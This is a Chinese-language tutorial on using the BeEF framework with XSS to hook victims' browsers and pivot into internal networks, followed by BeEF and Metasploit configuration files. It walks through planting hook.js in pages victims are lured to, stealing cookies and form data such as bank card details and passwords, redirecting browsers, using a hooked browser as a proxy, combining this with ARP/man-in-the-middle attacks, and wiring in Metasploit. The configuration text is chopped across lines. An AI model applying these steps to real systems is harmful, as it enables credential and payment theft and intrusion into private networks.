內網滲透一：利用Xss漏洞進入內網

0x01:科普

Beef目前歐美最流行的WEB框架攻擊平臺，全稱：The Browser Exploitation Framework Project. Beef利用簡單的XSS漏洞，通過一段編寫好的JavaScript（hook.js）控制目標主機的瀏覽器，通過目標主機瀏覽器獲得該主機的詳細信息，並進一步掃描內網，配合metasploit絕對是內網滲透一大殺器。

0x02安裝

Kali linux 系統默認未安裝beef，需要自行安裝。

1 2	`apt-get update` `apt-get install beef-xss`

0x03入門

0x03.1啓動

主目錄：

/usr/share/beef-xss

1 2	`cd /usr/share/beef-xss` `./beef`

127.0.0.1：3000/ui/pannel

賬號密碼

beef/beef

demos:Beef-Xss ip:3000/demos/butcher/index.html

測試兩臺主機網絡通信是否正常：

訪問Beef demo頁面

demo頁面嵌入了hook.js 訪問->中招

0x04掛馬：

在正常頁面添加script標籤，嵌入惡意腳本

在實際滲透中（需要一個公網的IP),如何讓受害者訪問我們嵌有hook.js的頁面呢？

網站反饋頁面，舉報頁面案例：用Xss平臺淪陷百度投訴中心後臺

當然，這位同學用的是Xss平臺，而不是beef,利用Beef的話，不僅能得到後臺管理員的Cookie，再配合Metasploit，還能以管理員主機瀏覽器當做跳板，進入公司內網。

Online Browersers->右擊->Use As Proxy

再配合ARP攻擊，MITM中間人攻擊，對內網內所有Http請求重定向基本...(這裏露出一個你懂的WS笑容)

Beef後臺檢測到有主機上線（感覺好像當年玩的灰鴿子、上興 =。= 囧）

通過瀏覽器，我們可以看到目標主機的很多信息：

瀏覽器信息：

名稱

版本

Browser UA String

Browser Platform

Windows size

插件基本信息：

Flash

VBS腳本

Web Sock

Quick Time

...

Api信息

操作系統信息

Date 時間日期

硬件信息

Cpu （32/64）

屏幕分辨率

是否支持觸屏

And So On

用火狐瀏覽器測試

Beef功能模塊組件

常用功能/模塊

1 2 3 4 5 Browser:獲取瀏覽器信息 --Hooked Domain -----Get Cookie 獲取客戶端Cookie信息執行一次命令在右邊顯示Cookie； -----Get From Value 獲取頁面提交的表單信息：截獲填寫的銀行卡信息、註冊頁面的用戶名密碼； -----Redirect Browser 瀏覽器重定向

執行後，目標瀏覽器訪問任何網站都將會被重定向到bobao.360.cn,實際滲透的時候在內網實施ARP攻擊，將內網所有Http請求流量重定向到嵌入了Hook惡意腳本的頁面...(在這裏露出一個淫蕩的笑容)

Chrome Extensions:

Debug:測試Http請求

Exploits:利用瀏覽器漏洞進行攻擊

Host：獲取受害者主機信息

Mtasploit:結合Metasploit進行滲透，這個也是本文的重點。

Network:進行Doser、ping、DNS枚舉、端口掃描等等

Social Enhineering：社工模塊

0x05與Metasploit聯動

Beef配置文件

/usr/share/beef-xss

/config.yaml

1 2	`metasploit:` `enable:false`

改成

1 2	`metasploit:` `enable:true`

#
Copyright (c) 2006-2013

Wade Alcorn - wade@bindshell.net

#
Browser Exploitation Framework (BeEF) - http://beefproject.com

#
See the file 'doc/COPYING'

for 
copying permission

#

#
BeEF Configuration file

beef:

    version:
'0.4.4.5-alpha'

    debug:
false

    restrictions:

        #
subnet of browser ip addresses that can hook to the framework

        permitted_hooking_subnet:
"0.0.0.0/0"

        #
subnet of browser ip addresses that can connect to the UI

        #
permitted_ui_subnet: "127.0.0.1/32"

        permitted_ui_subnet:
"0.0.0.0/0"

    http:

        debug:
false

#Thin::Logging.debug, very verbose. Prints also full exception stack trace.

        host:
"0.0.0.0"

        port:
"3000"

        #
Decrease this

setting up to 1000

if 
you want more responsiveness when sending modules and retrieving results.

        #
It's not advised to decrease it with tons of hooked browsers (more than 50),

        #
because it might impact performance. Also, enable WebSockets is generally better.

        xhr_poll_timeout:
5000

        #
if

running behind a nat set the public

ip address here

        #public:
""

        #public_port:
""

# port setting is experimental

        #
DNS

        dns_host:
"localhost"

        dns_port:
53

        panel_path:
"/ui/panel"

        hook_file:
"/hook.js"

        hook_session_name:
"BEEFHOOK"

        session_cookie_name:
"BEEFSESSION"

        #
Allow one or multiple domains to access the RESTful API using CORS

        #
For multiple domains use: "http://browserhacker.com,

http://domain2.com"

        restful_api:

            allow_cors:
false

            cors_allowed_domains:
"http://browserhacker.com"

        #
Prefer WebSockets over XHR-polling when possible.

        websocket:

          enable:
false

          secure:
true

# use WebSocketSecure work only on https domain and whit https support enabled in BeEF

          port:
61985

# WS: good success rate through proxies

          secure_port:
61986

# WSSecure

          ws_poll_timeout:
1000

# poll BeEF every second

        #
Imitate a specified web server (default

root page, 404

default 
error page, 'Server'

HTTP response header)

        web_server_imitation:

            enable:
true

            type:
"apache"

#supported: apache, iis

        #
Experimental HTTPS support for

the hook / admin / all other Thin managed web services

        https:

            enable:
false

            #
In production environments, be sure to use a valid certificate signed for

the value

            #
used in beef.http.dns_host (the domain name of the server where you run BeEF)

            key:
"beef_key.pem"

            cert:
"beef_cert.pem"

    database:

        #
For information on using other databases please read the

        #
README.databases file

        #
supported DBs: sqlite, mysql, postgres

        #
NOTE: you must change the Gemfile adding a gem require line like:

        #  
gem "dm-postgres-adapter"

        #
or

        #  
gem "dm-mysql-adapter"

        #
if

you want to switch

drivers from sqlite to postgres (or mysql).

        #
Finally, run a 'bundle
install' 
command and start BeEF.

        driver:
"sqlite"

        #
db_file is only used for

sqlite

        db_file:
"db/beef.db"

        #
db connection information is only used for

mysql/postgres

        db_host:
"localhost"

        db_port:
5432

        db_name:
"beef"

        db_user:
"beef"

        db_passwd:
"beef123"

        db_encoding:
"UTF-8"

    #
Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension

    credentials:

        user:  
"beef"

        passwd:
"beef"

    #
Autorun modules as soon the browser is hooked.

    #
NOTE: only modules with target type 'working'

or 'user_notify'

can be run automatically.

    autorun:

        enable:
true

        #
set this

to FALSE if

you don't want to allow auto-run execution for

modules with target->user_notify

        allow_user_notify:
true

    crypto_default_value_length:
80

    #
Enable client-side debugging

    client:

        debug:
false

    #
You may override default

extension configuration parameters here

    extension:

        requester:

            enable:
true

        proxy:

            enable:
true

        metasploit:

            enable:
true

        social_engineering:

            enable:
true

        evasion:

            enable:
false

        console:

             shell:

                enable:
false

        ipec:

            enable:
true

#
Copyright (c) 2006-2013

Wade Alcorn - wade@bindshell.net

#
Browser Exploitation Framework (BeEF) - http://beefproject.com

#
See the file 'doc/COPYING'

for 
copying permission

#

#
Enable MSF by changing extension:metasploit:enable to true

#
Then set msf_callback_host to be the public

IP of your MSF server

#

#
Ensure you load the xmlrpc interface

in Metasploit

#
msf > load msgrpc ServerHost=10.211.55.2

Pass=abc123 ServerType=Web

#
Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.

#
Also always use the IP of your machine where MSF is listening.

beef:

    extension:

        metasploit:

            name:
'Metasploit'

            enable:
true

            host:
"172.16.244.129"

            port:
55552

            user:
"msf"

            pass:
"abc123"

            uri:
'/api'

            ssl:
false

            ssl_version:
'SSLv3'

            ssl_verify:
true

            callback_host:
"172.16.244.129"

            autopwn_url:
"autopwn"

            auto_msfrpcd:
false

            auto_msfrpcd_timeout:
120

            msf_path:
[ 

              {os:
'osx',
path: '/opt/local/msf/'},

              {os:
'livecd',
path: '/opt/metasploit-framework/'},

              {os:
'bt5r3',
path: '/opt/metasploit/msf3/'},

              {os:
'bt5',
path: '/opt/framework3/msf3/'},

              {os:
'backbox',
path: '/opt/metasploit3/msf3/'},

              {os:
'win',
path: 'c:\\metasploit-framework\\'},

              {os:
'custom',
path: '/usr/share/metasploit-framework/'}

            ]